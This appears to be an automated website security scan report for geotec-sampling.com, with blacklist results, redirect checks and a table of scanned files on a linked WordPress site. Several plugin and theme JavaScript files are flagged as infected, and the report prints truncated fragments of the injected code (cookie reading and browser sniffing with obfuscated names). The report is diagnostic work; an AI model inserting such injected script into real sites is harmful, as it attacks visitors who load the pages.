Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=geotec-sampling.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://geotec-sampling.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: magnumgraphics.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT
...1411 bytes of data.
GET / HTTP/1.1
Host: magnumgraphics.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Sep 2014 21:49:25 GMT
Accept-Ranges: bytes
ETag: "1998209-583-4cd7c210"
Server: Apache
Content-Length: 1411
Content-Type: text/html
Last-Modified: Mon, 08 Nov 2010 09:25:36 GMT
...1411 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: magnumgraphics.com
Referer: http://www.google.com/search?q=magnumgraphics.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.geotec-sampling.com/ | 200 OK Content-Length: 855 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: asg-geotecnia.es <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /</title> </head> <body> <h1>Index of /</h1> <ul><li><a href=".ftpquota"> .ftpquota</a></li> <li><a href="asg-geotecnia.es/"> asg-geotecnia.es/</a></li> <li><a href="cgi-bin/"> cgi-bin/</a></li> <li><a href="geointec.com/"> geointec.com/</a></li> <li><a href="geotec-sampling.com/"> geotec-sampling.com/</a></li> <li><a href="hmoreno/"> hmoreno/</a></li> <li><a href="readme.html"> readme.html</a></li> &l ...[520 bytes skipped]... | ||
http://www.geotec-sampling.com/.ftpquota | 403 Forbidden Content-Length: 330 Content-Type: text/html | clean |
http://www.geotec-sampling.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.geotec-sampling.com/asg-geotecnia.es/ | 200 OK Content-Length: 316 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: asg-geotecnia.es <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /asg-geotecnia.es</title> </head> <body> <h1>Index of /asg-geotecnia.es</h1> <ul><li><a href="/"> Parent Directory</a></li> <li><a href="google36d5d9cc0ca81a66.html"> google36d5d9cc0ca81a66.html</a></li> </ul> </body></html> | ||
http://www.geotec-sampling.com/asg-geotecnia.es/google36d5d9cc0ca81a66.html | 200 OK Content-Length: 53 Content-Type: text/html | clean |
http://www.geotec-sampling.com/cgi-bin/ | 403 Forbidden Content-Length: 329 Content-Type: text/html | clean |
http://www.geotec-sampling.com/geointec.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 10 Oct 2014 22:05:30 GMT Location: http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com Server: nginx admin Content-Length: 0 Content-Type: text/html X-Cache: HIT from Backend X-Powered-By: PHP/5.3.28 | malicious |
http://www.geointec.com/wp-signup.php?new=www.geotec-sampling.com | 200 OK Content-Length: 63418 Content-Type: text/html | clean |
http://www.geointec.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://www.geointec.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.5.95&ver=4.0 | 200 OK Content-Length: 95731 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo })(jQuery) Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.5.95&ver=4.0 | 200 OK Content-Length: 107645 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/themes/rttheme18/js/modernizr.min.js?ver=4.0 | 200 OK Content-Length: 15865 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.18 | 200 OK Content-Length: 17265 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo Antivirus reports:
| ||
http://www.geointec.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1 | 200 OK Content-Length: 9103 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; $.fn.wpcf7FillResponseOutput = function(message) { return this.each(function() { $(this).find('div.wpcf7-response-output').append(message).slideDown('fast'); }); }; })(jQuery); Antivirus reports:
| ||
http://www.geointec.com/wp-content/themes/rttheme18/js/jquery.easing.1.3.js?ver=4.0 | 200 OK Content-Length: 8704 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
|